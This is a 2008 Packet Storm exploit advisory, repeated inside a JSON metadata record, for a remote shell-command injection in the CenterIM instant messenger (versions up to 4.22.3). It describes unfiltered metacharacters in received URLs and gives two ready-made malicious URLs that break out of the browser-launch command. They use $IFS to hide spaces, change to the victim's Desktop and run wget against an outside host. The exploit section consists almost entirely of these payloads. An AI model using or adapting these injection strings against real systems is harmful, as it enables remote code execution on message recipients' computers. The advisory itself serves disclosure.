ID PACKETSTORM:64761
Type packetstorm
Reporter Brian Fonfara
Modified 2008-03-20T00:00:00
Description
`#######################################################################
Application: CenterIM
http://www.centerim.org/index.php/Main_Page
Versions: centerim <= 4.22.3
OS: Linux
Bug: Execution of shell commands
Exploit: remote
Date: 15 March 2008
Author: Brian Fonfara (w00)
eMail: brian.fonfara@gmx.de
Web: newb.kicks-ass.net
#######################################################################
1) Bug
2) Exploit
#######################################################################
=======
1) Bug
=======
Received URLs in the message window do not get checked for illegal
characters, like "\'", "\"", ";", "$", "{", "}", "&&" and "||"
#######################################################################
===========
2) Exploit
===========
Standard settings:
- Browser already open:
http://gidf.de/centerim)';cd$IFS$HOME/Desktop;wget${IFS}http://google.de;'(
- New browser instance:
http://gidf.de/centerim"&cd$IFS$HOME/Desktop;wget${IFS}http://google.de"
#######################################################################
Greets to: mrks
`
{"hash": "d937a94504e6538fcdd637994c97d143bdccbb223c9e72ed9594eac52224c79a", "sourceHref": "https://packetstormsecurity.com/files/download/64761/centerim-exec.txt", "title": "centerim-exec.txt", "id": "PACKETSTORM:64761", "published": "2008-03-20T00:00:00", "description": "", "modified": "2008-03-20T00:00:00", "sourceData": "`####################################################################### \n \nApplication: CenterIM \nhttp://www.centerim.org/index.php/Main_Page \nVersions: centerim <= 4.22.3 \nOS: Linux \nBug: Execution of shell commands \nExploit: remote \nDate: 15 March 2008 \nAuthor: Brian Fonfara (w00) \neMail: brian.fonfara@gmx.de \nWeb: newb.kicks-ass.net \n \n \n####################################################################### \n \n1) Bug \n2) Exploit \n \n \n####################################################################### \n \n======= \n1) Bug \n======= \n \nReceived URLs in the message window do not get checked for illegal \ncharacters, like \"\\'\", \"\\\"\", \";\", \"$\", \"{\", \"}\", \"&&\" and \"||\" \n \n####################################################################### \n \n=========== \n2) Exploit \n=========== \n \nStandard settings: \n- Browser already open: \nhttp://gidf.de/centerim)';cd$IFS$HOME/Desktop;wget${IFS}http://google.de;'( \n \n- New browser instance: \nhttp://gidf.de/centerim\"&cd$IFS$HOME/Desktop;wget${IFS}http://google.de\" \n \n####################################################################### \n \nGreets to: mrks \n \n`\n", "reporter": "Brian Fonfara", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "8b6e2ea4f561a8f64b93cee830f7e373"}, {"key": "modified", "hash": "2f073411a4124b00bebd851c292667e9"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "2f073411a4124b00bebd851c292667e9"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "817bacb908e17444737ed2abf41b5002"}, {"key": "sourceData", "hash": "c568e143c8755381939985f4702e16b6"}, {"key": "sourceHref", "hash": "9c2a97b909b011d8e2f01611ceb3abb8"}, {"key": "title", "hash": "7fbe712343142409a1acd397ac104a76"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/64761/centerim-exec.txt.html", "lastseen": "2016-11-03T10:25:01", "viewCount": 0, "enchantments": {"vulnersScore": 7.5}}
{"result": {}}
